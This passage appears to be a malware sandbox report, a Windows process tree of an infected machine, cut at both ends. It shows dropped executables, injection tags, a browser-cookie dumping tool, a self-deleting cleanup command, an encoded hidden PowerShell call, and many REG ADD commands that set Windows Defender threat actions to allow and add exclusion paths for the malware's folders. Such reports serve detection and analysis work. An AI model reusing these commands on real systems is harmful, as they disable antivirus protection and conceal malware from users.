                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im eRzWl6iaJHG7uQjJjLchwstd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eRzWl6iaJHG7uQjJjLchwstd.exe" & del C:\ProgramData\*.dll & exit
                                                                          6⤵
                                                                            PID:2096
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im eRzWl6iaJHG7uQjJjLchwstd.exe /f
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:2420
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              7⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1996
                                                                        • C:\Users\Admin\Documents\bjx6tO9GexOeukST5LCjYj2Q.exe
                                                                          "C:\Users\Admin\Documents\bjx6tO9GexOeukST5LCjYj2Q.exe"
                                                                          5⤵
                                                                            PID:1032
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1440
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.exe
                                                                          arnatic_7.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4880
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_7.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3364
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c arnatic_8.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1320
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_8.exe
                                                                          arnatic_8.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4644
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1580
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:5080
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4048
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_5.exe
                                                                    arnatic_5.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4888
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_4.exe
                                                                    arnatic_4.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1400
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:1804
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3472
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_3.exe
                                                                    arnatic_3.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4816
                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      PID:2216
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 628
                                                                        3⤵
                                                                        • Program crash
                                                                        PID:3556
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2216 -ip 2216
                                                                    1⤵
                                                                      PID:3020
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3752 -ip 3752
                                                                      1⤵
                                                                        PID:4968
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3668 -ip 3668
                                                                        1⤵
                                                                          PID:4104
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1260 -ip 1260
                                                                          1⤵
                                                                            PID:4016
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                            1⤵
                                                                              PID:1936
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3668 -ip 3668
                                                                              1⤵
                                                                                PID:3344
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4672 -ip 4672
                                                                                1⤵
                                                                                  PID:5040
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1260 -ip 1260
                                                                                  1⤵
                                                                                    PID:4880
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2912 -ip 2912
                                                                                    1⤵
                                                                                      PID:1804
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1260 -ip 1260
                                                                                      1⤵
                                                                                        PID:4220
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1260 -ip 1260
                                                                                        1⤵
                                                                                          PID:1580
                                                                                        • C:\Windows\SysWOW64\efomexnt\dgwvoqxa.exe
                                                                                          C:\Windows\SysWOW64\efomexnt\dgwvoqxa.exe /d"C:\Users\Admin\Documents\ESv1OFv4y1pvLXIU0OXXKngA.exe"
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2988
                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                            svchost.exe
                                                                                            2⤵
                                                                                              PID:1996
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1260 -ip 1260
                                                                                            1⤵
                                                                                              PID:2236
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4776 -ip 4776
                                                                                              1⤵
                                                                                                PID:4972
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1260 -ip 1260
                                                                                                1⤵
                                                                                                  PID:3580
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1260 -ip 1260
                                                                                                  1⤵
                                                                                                    PID:3560
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1260 -ip 1260
                                                                                                    1⤵
                                                                                                      PID:4248
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      1⤵
                                                                                                        PID:1656
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 580 -p 1804 -ip 1804
                                                                                                        1⤵
                                                                                                          PID:4668
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\kTCMygy.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\kTCMygy.exe j6 /site_id 525403 /S
                                                                                                          1⤵
                                                                                                            PID:5060
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                              2⤵
                                                                                                                PID:3216
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  3⤵
                                                                                                                    PID:3600
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:480
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:4040
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:2396
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:4016
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:4332
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4916
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3064
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:3564
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1124
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1176
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:320
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4468
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4256
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4104
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4244
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3324
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4784
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      PID:4148
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3020
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1368
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1208
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1596
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3512
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3128
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3744
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3752
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2212
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:544
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4680
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2204
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:224
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1160
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3668
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:384
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4912
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:364
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3816
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
